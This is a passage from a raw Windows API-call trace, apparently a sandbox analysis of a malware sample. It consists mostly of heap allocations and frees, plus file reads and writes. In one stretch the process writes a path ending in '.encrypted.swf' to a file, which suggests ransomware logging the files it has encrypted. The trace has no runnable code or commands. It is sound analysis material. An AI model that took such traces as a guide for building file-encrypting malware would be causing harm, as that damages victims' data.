hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0044.048] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee24 | out: lpNewFilePointer=0x0) returned 1 [0044.048] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0044.048] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee04 | out: lpNewFilePointer=0x0) returned 1 [0044.048] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4f8 [0044.048] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10000) returned 0xab2010 [0044.048] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af338 [0044.048] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0044.048] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee14 | out: lpNewFilePointer=0x0) returned 1 [0044.048] ReadFile (in: hFile=0x128, lpBuffer=0xaa0008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0xaa0008*, lpNumberOfBytesRead=0x6aee3c*=0x3a10, lpOverlapped=0x0) returned 1 [0044.049] ReadFile (in: hFile=0x128, lpBuffer=0xaa0008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0xaa0008*, lpNumberOfBytesRead=0x6aee3c*=0x0, lpOverlapped=0x0) returned 1 [0044.049] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x3a10, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0044.049] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee04 | out: lpNewFilePointer=0x0) returned 1 [0044.049] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0044.049] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0xab2010 | out: hHeap=0x770000) returned 1 [0044.049] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca30 [0044.049] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af338 [0044.049] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\tvat.encrypted.swf\r\n", cchWideChar=73, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 73 [0044.050] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x49) returned 0x7f36e0 [0044.050] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\tvat.encrypted.swf\r\n", cchWideChar=73, lpMultiByteStr=0x7f36e0, cbMultiByte=73, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\tvat.encrypted.swf\r\n", lpUsedDefaultChar=0x0) returned 73 [0044.050] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca30 | out: hHeap=0x770000) returned 1 [0044.050] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x50) returned 0x7f3688 [0044.050] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7f36e0 | out: hHeap=0x770000) returned 1 [0044.050] WriteFile (in: hFile=0x128, lpBuffer=0x7f3688*, nNumberOfBytesToWrite=0x48, lpNumberOfBytesWritten=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0x7f3688*, lpNumberOfBytesWritten=0x6aee3c*=0x48, lpOverlapped=0x0) returned 1 [0044.050] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7f3688 | out: hHeap=0x770000) returned 1 [0044.050] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0044.050] CloseHandle (hObject=0x128) returned 1 [0044.051] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9a0 | out: hHeap=0x770000) returned 1 [0044.051] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0044.051] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0xaa0008 | out: hHeap=0x770000) returned 1 [0044.052] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2240 | out: hHeap=0x770000) returned 1 [0044.052] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab260 | out: hHeap=0x770000) returned 1 [0044.052] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0044.052] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdc0 | out: hHeap=0x770000) returned 1 [0044.052] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdd8 | out: hHeap=0x770000) returned 1 [0044.052] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c5448 | out: hHeap=0x770000) returned 1 [0044.052] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0044.052] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd18 | out: hHeap=0x770000) returned 1 [0044.052] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c790 | out: hHeap=0x770000) returned 1 [0044.052] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1648 | out: hHeap=0x770000) returned 1 [0044.052] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0044.052] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c20c0 | out: hHeap=0x770000) returned 1 [0044.052] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0044.052] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab2f0 | out: hHeap=0x770000) returned 1 [0044.052] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897f0 | out: hHeap=0x770000) returned 1 [0044.052] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14e0 | out: hHeap=0x770000) returned 1 [0044.052] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0044.052] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14b8 | out: hHeap=0x770000) returned 1 [0044.052] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7d5c40 | out: hHeap=0x770000) returned 1 [0044.052] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0044.052] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889688 | out: hHeap=0x770000) returned 1 [0044.052] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9d0 | out: hHeap=0x770000) returned 1 [0044.052] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899d0 | out: hHeap=0x770000) returned 1 [0044.052] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0044.052] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1300 | out: hHeap=0x770000) returned 1 [0044.052] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c808 | out: hHeap=0x770000) returned 1 [0044.052] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0ce8 | out: hHeap=0x770000) returned 1 [0044.052] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0044.052] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13f0 | out: hHeap=0x770000) returned 1 [0044.053] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899b8 | out: hHeap=0x770000) returned 1 [0044.053] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7a8 | out: hHeap=0x770000) returned 1 [0044.053] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1328 | out: hHeap=0x770000) returned 1 [0044.053] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0044.053] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0c70 | out: hHeap=0x770000) returned 1 [0044.053] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cce8 | out: hHeap=0x770000) returned 1 [0044.053] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8e0 | out: hHeap=0x770000) returned 1 [0044.053] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a78 | out: hHeap=0x770000) returned 1 [0044.053] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0044.053] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1378 | out: hHeap=0x770000) returned 1 [0044.053] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8b0 | out: hHeap=0x770000) returned 1 [0044.053] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0044.053] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce98 | out: hHeap=0x770000) returned 1 [0044.053] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889b08 | out: hHeap=0x770000) returned 1 [0044.053] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b12b0 | out: hHeap=0x770000) returned 1 [0044.053] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0044.053] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13c8 | out: hHeap=0x770000) returned 1 [0044.053] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889970 | out: hHeap=0x770000) returned 1 [0044.053] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af438 | out: hHeap=0x770000) returned 1 [0044.053] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1508 | out: hHeap=0x770000) returned 1 [0044.053] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb80 | out: hHeap=0x770000) returned 1 [0044.053] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889928 | out: hHeap=0x770000) returned 1 [0044.053] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1440 | out: hHeap=0x770000) returned 1 [0044.053] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0044.053] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2080 | out: hHeap=0x770000) returned 1 [0044.053] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0044.053] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2040 | out: hHeap=0x770000) returned 1 [0044.053] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0044.053] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab2a8 | out: hHeap=0x770000) returned 1 [0044.053] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889b20 | out: hHeap=0x770000) returned 1 [0044.053] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7cc068 | out: hHeap=0x770000) returned 1 [0044.053] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af628 | out: hHeap=0x770000) returned 1 [0044.053] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889bc8 | out: hHeap=0x770000) returned 1 [0044.053] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889c28 | out: hHeap=0x770000) returned 1 [0044.053] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c1020 | out: hHeap=0x770000) returned 1 [0044.053] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5d8 | out: hHeap=0x770000) returned 1 [0044.053] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889bf8 | out: hHeap=0x770000) returned 1 [0044.054] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889be0 | out: hHeap=0x770000) returned 1 [0044.054] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b5860 | out: hHeap=0x770000) returned 1 [0044.054] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af6a8 | out: hHeap=0x770000) returned 1 [0044.054] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889b50 | out: hHeap=0x770000) returned 1 [0044.054] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889b38 | out: hHeap=0x770000) returned 1 [0044.054] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b58e8 | out: hHeap=0x770000) returned 1 [0044.054] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af698 | out: hHeap=0x770000) returned 1 [0044.054] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889b80 | out: hHeap=0x770000) returned 1 [0044.054] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889b68 | out: hHeap=0x770000) returned 1 [0044.054] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ac760 | out: hHeap=0x770000) returned 1 [0044.054] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af6c8 | out: hHeap=0x770000) returned 1 [0044.054] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889bb0 | out: hHeap=0x770000) returned 1 [0044.054] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889b98 | out: hHeap=0x770000) returned 1 [0044.054] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c1678 | out: hHeap=0x770000) returned 1 [0044.054] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af638 | out: hHeap=0x770000) returned 1 [0044.054] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889c88 | out: hHeap=0x770000) returned 1 [0044.054] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889cb8 | out: hHeap=0x770000) returned 1 [0044.054] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7d4238 | out: hHeap=0x770000) returned 1 [0044.054] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af648 | out: hHeap=0x770000) returned 1 [0044.054] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889c40 | out: hHeap=0x770000) returned 1 [0044.054] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8893d0 | out: hHeap=0x770000) returned 1 [0044.054] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7d42c0 | out: hHeap=0x770000) returned 1 [0044.054] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af658 | out: hHeap=0x770000) returned 1 [0044.054] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889cd0 | out: hHeap=0x770000) returned 1 [0044.054] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ca0 | out: hHeap=0x770000) returned 1 [0044.054] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ac6e8 | out: hHeap=0x770000) returned 1 [0044.054] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af678 | out: hHeap=0x770000) returned 1 [0044.054] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889d78 | out: hHeap=0x770000) returned 1 [0044.054] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889c58 | out: hHeap=0x770000) returned 1 [0044.054] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ac7d8 | out: hHeap=0x770000) returned 1 [0044.054] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af688 | out: hHeap=0x770000) returned 1 [0044.054] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889d30 | out: hHeap=0x770000) returned 1 [0044.054] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889c70 | out: hHeap=0x770000) returned 1 [0044.054] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ac850 | out: hHeap=0x770000) returned 1 [0044.054] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af668 | out: hHeap=0x770000) returned 1 [0044.054] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889d18 | out: hHeap=0x770000) returned 1 [0044.054] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889d00 | out: hHeap=0x770000) returned 1 [0044.054] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7d4348 | out: hHeap=0x770000) returned 1 [0044.054] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af6e8 | out: hHeap=0x770000) returned 1 [0044.055] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8894f0 | out: hHeap=0x770000) returned 1 [0044.055] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889400 | out: hHeap=0x770000) returned 1 [0044.055] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ac8c8 | out: hHeap=0x770000) returned 1 [0044.055] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af738 | out: hHeap=0x770000) returned 1 [0044.055] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8893e8 | out: hHeap=0x770000) returned 1 [0044.055] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889e08 | out: hHeap=0x770000) returned 1 [0044.055] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7d43d0 | out: hHeap=0x770000) returned 1 [0044.055] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af718 | out: hHeap=0x770000) returned 1 [0044.055] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889328 | out: hHeap=0x770000) returned 1 [0044.055] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889238 | out: hHeap=0x770000) returned 1 [0044.055] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ac940 | out: hHeap=0x770000) returned 1 [0044.055] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af708 | out: hHeap=0x770000) returned 1 [0044.055] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889da8 | out: hHeap=0x770000) returned 1 [0044.055] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889d90 | out: hHeap=0x770000) returned 1 [0044.055] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ac9b8 | out: hHeap=0x770000) returned 1 [0044.055] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af728 | out: hHeap=0x770000) returned 1 [0044.055] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889e80 | out: hHeap=0x770000) returned 1 [0044.055] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889e68 | out: hHeap=0x770000) returned 1 [0044.055] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7aca30 | out: hHeap=0x770000) returned 1 [0044.055] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af6b8 | out: hHeap=0x770000) returned 1 [0044.055] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889e50 | out: hHeap=0x770000) returned 1 [0044.055] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ee0 | out: hHeap=0x770000) returned 1 [0044.055] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7d4458 | out: hHeap=0x770000) returned 1 [0044.055] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af6f8 | out: hHeap=0x770000) returned 1 [0044.055] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889e98 | out: hHeap=0x770000) returned 1 [0044.055] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889e20 | out: hHeap=0x770000) returned 1 [0044.055] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7d44e0 | out: hHeap=0x770000) returned 1 [0044.055] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af778 | out: hHeap=0x770000) returned 1 [0044.055] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ec8 | out: hHeap=0x770000) returned 1 [0044.055] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889eb0 | out: hHeap=0x770000) returned 1 [0044.055] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7d4568 | out: hHeap=0x770000) returned 1 [0044.055] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af878 | out: hHeap=0x770000) returned 1 [0044.055] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889f88 | out: hHeap=0x770000) returned 1 [0044.055] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889e38 | out: hHeap=0x770000) returned 1 [0044.055] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7acaa8 | out: hHeap=0x770000) returned 1 [0044.055] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7f8 | out: hHeap=0x770000) returned 1 [0044.055] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889f70 | out: hHeap=0x770000) returned 1 [0044.055] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889f58 | out: hHeap=0x770000) returned 1 [0044.055] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7acb20 | out: hHeap=0x770000) returned 1 [0044.056] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af888 | out: hHeap=0x770000) returned 1 [0044.056] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889fe8 | out: hHeap=0x770000) returned 1 [0044.056] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889fa0 | out: hHeap=0x770000) returned 1 [0044.056] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7d45f0 | out: hHeap=0x770000) returned 1 [0044.056] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af928 | out: hHeap=0x770000) returned 1 [0044.056] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889f28 | out: hHeap=0x770000) returned 1 [0044.056] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889f10 | out: hHeap=0x770000) returned 1 [0044.056] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7acb98 | out: hHeap=0x770000) returned 1 [0044.056] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af838 | out: hHeap=0x770000) returned 1 [0044.056] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ef8 | out: hHeap=0x770000) returned 1 [0044.056] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889fd0 | out: hHeap=0x770000) returned 1 [0044.056] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7acc10 | out: hHeap=0x770000) returned 1 [0044.056] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af858 | out: hHeap=0x770000) returned 1 [0044.056] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889f40 | out: hHeap=0x770000) returned 1 [0044.056] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889fb8 | out: hHeap=0x770000) returned 1 [0044.056] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c1700 | out: hHeap=0x770000) returned 1 [0044.056] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af818 | out: hHeap=0x770000) returned 1 [0044.056] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88a078 | out: hHeap=0x770000) returned 1 [0044.056] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88a060 | out: hHeap=0x770000) returned 1 [0044.056] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c17b8 | out: hHeap=0x770000) returned 1 [0044.056] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af808 | out: hHeap=0x770000) returned 1 [0044.056] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88a0c0 | out: hHeap=0x770000) returned 1 [0044.056] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88a0a8 | out: hHeap=0x770000) returned 1 [0044.056] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c1870 | out: hHeap=0x770000) returned 1 [0044.056] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7b8 | out: hHeap=0x770000) returned 1 [0044.056] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88a048 | out: hHeap=0x770000) returned 1 [0044.056] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88a090 | out: hHeap=0x770000) returned 1 [0044.056] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c1918 | out: hHeap=0x770000) returned 1 [0044.056] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af828 | out: hHeap=0x770000) returned 1 [0044.056] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88a000 | out: hHeap=0x770000) returned 1 [0044.056] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88a030 | out: hHeap=0x770000) returned 1 [0044.056] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7cb080 | out: hHeap=0x770000) returned 1 [0044.056] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af758 | out: hHeap=0x770000) returned 1 [0044.056] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88a1e0 | out: hHeap=0x770000) returned 1 [0044.056] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88a018 | out: hHeap=0x770000) returned 1 [0044.056] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c19d0 | out: hHeap=0x770000) returned 1 [0044.056] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af848 | out: hHeap=0x770000) returned 1 [0044.056] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88a138 | out: hHeap=0x770000) returned 1 [0044.056] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88a0d8 | out: hHeap=0x770000) returned 1 [0044.056] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c1a78 | out: hHeap=0x770000) returned 1 [0044.057] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af898 | out: hHeap=0x770000) returned 1 [0044.057] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88a1c8 | out: hHeap=0x770000) returned 1 [0044.057] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88a180 | out: hHeap=0x770000) returned 1 [0044.057] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c1b20 | out: hHeap=0x770000) returned 1 [0044.057] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af6d8 | out: hHeap=0x770000) returned 1 [0044.057] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88a0f0 | out: hHeap=0x770000) returned 1 [0044.057] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88a1b0 | out: hHeap=0x770000) returned 1 [0044.057] HeapFree (in: 